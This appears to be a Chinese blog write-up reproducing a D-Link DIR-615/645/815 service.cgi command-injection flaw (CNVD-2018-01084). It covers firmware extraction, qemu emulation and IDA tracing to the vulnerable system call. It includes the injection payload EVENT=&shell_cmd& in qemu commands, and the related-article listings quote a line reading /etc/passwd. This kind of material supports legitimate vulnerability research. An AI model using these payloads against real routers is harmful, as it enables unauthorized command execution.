Dlink路由器 CNVD-2018-01084 远程命令执行漏洞 复现分析

最新推荐文章于 2024-04-30 09:46:41 发布
最新推荐文章于 2024-04-30 09:46:41 发布
阅读量1k 收藏 1
点赞数
分类专栏: 漏洞复现 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44229639/article/details/121118439
版权

Dlink路由器 CNVD-2018-01084复现分析

0x01 背景介绍

D-Link DIR 615/645/815路由器1.03及之前的固件版本存在远程命令执行漏洞。该漏洞是由于service.cgi中拼接了HTTP POST请求中的数据,造成后台命令拼接,导致可执行任意命令

cnvd上的漏洞说明:https://www.cnvd.org.cn/flaw/show/CNVD-2018-01084

0x02 固件分析

  1. 在官网获取漏洞版本的固件:DIR645A1_FW102B08.bin

  2. 解压固件,获得文件系统

    (1)安装sasquatch 在这里插入图片描述
    ​ 需要安装sasquatch

    ​ https://github.com/devttys0/sasquatch

    (2)binwalk
    在这里插入图片描述
    在这里插入图片描述
    ​ 获得完整的文件系统
    CGI中一般通过getenv或stdlib库函数getenv来获得环境变量获取post过来的数据,

getenv

要注入的命令放到request_uri环境变量时候成功

0x03 固件仿真

​ 使用qemu user mode 对固件进行部分仿真,对象是cgibin

chroot . ./qemu-mipsel-static ./htdocs/cgibin

​ 由于chroot . 改变根目录 无法搜索环境变量 qemu-mipsel-static

​ 将其拷贝至当前目录 以./qemu-mipsel-static调用
在这里插入图片描述
​ 发现提示unknown command cgibin

​ 使用IDA分析main函数,发现:

在这里插入图片描述

​ 将第一个参数与XXX.cgi做对比,选择执行XXX_main函数

​ 那么,使用qemu -0方式 指定第一个参数

chroot . ./qemu-mipsel-static -0 "service.cgi" ./htdocs/cgibin

在这里插入图片描述
现在只要确定漏洞的调用链,并构造HTTP POST请求即可。

0x04 漏洞分析

​ 命令注入一般发生在危险函数出现的地方,例如system, execve,execlp

​ 以本漏洞的cgibin文件为例,使用IDA对system溯源分析

在这里插入图片描述

漏洞在lxmldbc_system函数
在这里插入图片描述

溯源可得
在这里插入图片描述

​ 构造 EVENT=&shell_cmd& 则对于

​ lxmldbc_system(“event %s > /dev/null”, v5)

​ 等价为:system(event & shell_cmd & > /dev/null)

​ 可注入shell_cmd

溯源至main函数,构造完整的POST请求

​ CGI中一般通过getenv来获得环境变量获取post过来的数据。在cgibin中未找到stdin,scanf这样的函数或者字符串,因此把要注入的命令当做输入参数传递不能成功,仔细检查每一个genenv,把要注入的命令放到request_uri环境变量时候成功。

在这里插入图片描述
In cgibin_parse_request
在这里插入图片描述
​ 最终脚本:

sudo chroot . ./qemu-mipsel-static  \
-0 "service.cgi" \
-E REQUEST_METHOD="POST" \
-E CONTENT_LENGTH=100 \
-E REQUEST_URI="service.cgi?EVENT=%26ls%ls" \
-E CONTENT_TYPE="application/x-www-form-urlencoded" \
-E HTTP_COOKIE="uid=ztl" \
./htdocs/cgibin

在这里插入图片描述
异常错误??
在IDA中搜索:
在这里插入图片描述
可视化调用链:
在这里插入图片描述

0x05 动态调试

sudo chroot . ./qemu-mipsel-static -strace -g 1234	 \
-0 "service.cgi" \
-E REQUEST_METHOD="POST" \
-E CONTENT_LENGTH=100 \
-E REQUEST_URI="service.cgi?EVENT=%26ls%26" \
-E CONTENT_TYPE="application/x-www-form-urlencoded" \
-E HTTP_COOKIE="uid=ztl" \
./htdocs/cgibin

发现问题在cgibin_parse_request函数

在这里插入图片描述

动态调试,修改对应寄存器的值,使得可以正常运行至system
在这里插入图片描述

跳过 sess_validate函数(仿真环境没有路由器的证书等配置)
在这里插入图片描述

​ 成功执行ls函数,并打印
在这里插入图片描述

0x06 漏洞利用

构造EVENT=&shell_cmd&

即可注入shell_cmd

​ 以删除某文件为例
在这里插入图片描述
​ 最终效果:
在这里插入图片描述

2T1
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
CNVD-2018-01084 远程代码执行复现
SkYe's Blog
02-09 719
Dlink DIR 615/645/815 路由上远程代码执行漏洞漏洞存在于 /htdocs/cgibin 二进制文件中,原因是 service.cgi 中未经过滤就将用户输入拼接到命令中。 复现环境 漏洞固件 Firmware:DIR-645_A1_FW: v1.02b08 (for WW) (tw官网选择 DIR-645 第一个文件) qemu v5.2 Ubuntu 18.04 ida 7.5(能搞 mips 反编译工具都行) 直接运行如下: 漏洞分析 strrchr 匹配出 / 后面的参数后
【从零复现CVE漏洞】Tenda 路由器栈溢出复现(CVE-2018-18708)
m0_55368674的博客
02-09 2343
Tenda 路由器栈溢出复现(CVE-2018-18708)
D-Link设备远程命令执行漏洞(CVE-2024-3273)
最新发布
qq_69775412的博客
04-30 333
D-Link NAS设备nas_sharing.cgi接口存在远程命令执行漏洞
我用一个例子疏通“路由器漏洞&复现”【建议收藏!!】
kali_Ma的博客
07-04 787
一、介绍 ​ 该缺陷存在于Cisco IOS XR软件的Cisco Discovery Protocol中,它可能导致黑客的攻击。 ​ “该漏洞是Cisco Discovery Protocol中字段字符串输入的错误验证所致。黑客可以通过向受影响设备发送恶意Cisco Discovery Protocol数据包以利用漏洞。” “被成功利用的漏洞可能导致堆栈溢出,黑客便可以执行任意代码。” ​ Cisco专家指出,其他黑客也可以利用此缺陷。美国国家安全局(NSA)声称该漏洞漏洞排名中位居前25。 IOS .
路由器漏洞复现_看了之后每个人都是黑客
m0_67742636的博客
06-20 799
渗透测试,网络安全路由器安全
DLink_RCE_CVE-2019-17621浅析
Starr
04-20 4559
文章目录漏洞信息Firmadyne信息收集UPnP协议漏洞分析调试Exp参考资料 漏洞信息 CVE - CVE-2019-17621 (mitre.org) 漏洞服务:UPnP 相关URL:/gena.cgi 描述:给UPnP服务发送构造好的HTTP SUBSCRIBE请求,实现root权限RCE。 固件下载链接 Firmadyne $ sudo python3 ./sources/extractor/extractor.py -b DLink -sql 127.0.0.1 -np -nk ./DIR822
D-link路由器限速思路的分析
10-01
以下是对D-Link路由器限速思路的详细分析: 一、封端口 封端口是一种基本的限制策略,但其效果有限。由于P2P软件如BT、电驴等可以动态指定或使用广泛的端口范围,完全封禁并不实际。不过,可以针对常见的端口进行...
UniFI-Dlink-DIR-615:Dlink DIR 615 漏洞利用
06-02
UniFI-Dlink-DIR-615 搜索 Unifi Dlink DIR-615 路由器的服务器详细信息 = Mathopd/1.5p6 country:MY 国家过滤器仅适用于注册用户,因此请确保您已注册 选择任何你想要的路由器 要获取用户的凭据,请输入以下 ...
dlink-dcs-python-lib:用于控制DLINK DCS 5025L无线IP摄像机的Python库
05-11
DLINK DCS 5025L无线IP摄像机的Python库 该库已为DLINK DCS 5025L无线Pan Tile IP网络摄像头构建并经过测试。 该库可与其他DLINK IP摄像机完全或部分运行(未经测试)。 运行测试 运行库测试将更新和重置各种IP摄像...
dlink路由器无线信号经常中断的故障排除方法
10-01
在日常生活中,我们可能会遇到Dlink路由器无线信号频繁中断的问题,这给我们的网络使用带来很大不便。本篇文章将深入探讨可能导致这一现象的原因,并提供一系列的故障排除方法,以帮助用户解决这一问题。 首先,...
Dlink-dir615路由器安装说明
07-15
Dlink-dir615路由器安装说明 详细图文说明路由器的安装设置使用
D-Link 路由器信息泄露和远程命令执行漏洞分析及全球数据分析报告.pdf
02-28
近日,国家信息安全漏洞共享平台(CNVD)收录了D-Link DIR系列路由器身份验证信息泄露漏洞远程命令执行漏洞CNVD-2017-20002、CNVD-2017-20001)。远程攻击者利用漏洞可获取路由器后台登录凭证并执行任意代码。相关利用代码已在互联网公开,受到影响的设备数量根据标定超过20万台,有可能会诱发大规模的网络攻击
Tenda路由器 信息泄露漏洞复现
12-11 563
Tenda是一家专门提供网络设备和解决方案的公司,其中最知名的产品之一是路由器。Tenda路由器在家庭和小型办公室中非常受欢迎,因为它们提供了稳定的无线网络连接和易于设置的功能。
华为路由器远程命令执行漏洞复现(CVE-2017-17215)
Zeker62的博客
12-23 6908
华为路由器远程命令执行漏洞复现(CVE-2017-17215) 漏洞内容 这个漏洞算是比较老的一种漏洞了,但是具有一定的学习价值。 CheckPoint报告华为HG532路由器产品存在远程命令执行漏洞,可以执行任意的命令 远程命令执行漏洞,没有对代码中可执行的特殊函数入口做过滤,导致客户端可以提交恶意构造的语句提交,让服务器端执行。例如web服务器中的system、eval、exec等函数,在上面的CVE-2020-3452也算是远程命令执行漏洞的一种。 漏洞复现 环境搭建 我使用的是Windows商店下载
D-Link DIR505路由器溢出漏洞实战
牛叫兽的测试学习和分享
12-14 5085
IOT安全,溢出漏洞学习实践
路由器漏洞复现终极奥义——基于MIPS的shellcode编写
01-21 1259
前言 今天我们来聊聊如何在MIPS架构中编写shellcode。在前面的两篇文章中,我们分别介绍了基于MIPS的缓冲区溢出实践,以及进一步的如何利用学到的溢出知识复现与验证路由器漏洞。但是在上文的路由器漏洞利用的例子里面,我们需要有一个前置条件,即含有漏洞的程序必须导入了系统的库函数,我们才能方便的验证,然而这个条件并不是时刻有效的。因此,在本文中,我们介绍路由器漏洞复现的终极奥义——基于MI...
cve-2018-5767 路由器栈溢出漏洞复现
蚁景网安学院
02-15 1390
‍点击蓝字关注我们一、前言 本文通过arm架构的路由器栈溢出漏洞为例介绍IOT固件分析以及arm架构下的栈溢出利用。漏洞产生的原因是未对用户的输入进行合理的限制而直接使用sscanf函数拷...
漏洞复现】D-Link NAS设备nas_sharing.cgi接口存在远程命令执行漏洞CVE-2024-3273
失心少年
04-18 179
D-Link DNS-320是中国友讯(D-Link)公司的一款NAS(网络附属存储)设备。D-Link DNS-320L存在命令注入漏洞,该漏洞源于文件/cgi-bin/nas_sharing.cgi存在命令注入漏洞。受影响的产品和版本:D-Link DNS-320L,DNS-325,DNS-327,DNS-340L,D-Link NAS Storage。受影响的产品和版本:D-Link DNS-320L,DNS-325,DNS-327,DNS-340L,D-Link NAS Storage。
Samsung-WLAN-AP路由器RCE漏洞复现
The current road is different, love needs to distinguish between right and wrong
02-01 4262
简介: 三星-WLAN-AP-WEA453e 路由器存在远程命令执行。 fofa搜索: title="Samsung WLAN AP" 大多都是国外的,随便点击一个后进入网页主页面 漏洞利用: 利用burp构造特殊的请求 exp: POST /(download)/tmp/a.txt HTTP/1.1 Host: xxx.xxx.xxx.xxx command1=shell:cat /etc/passwd| dd of=/tmp/a.txt 利用工具
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值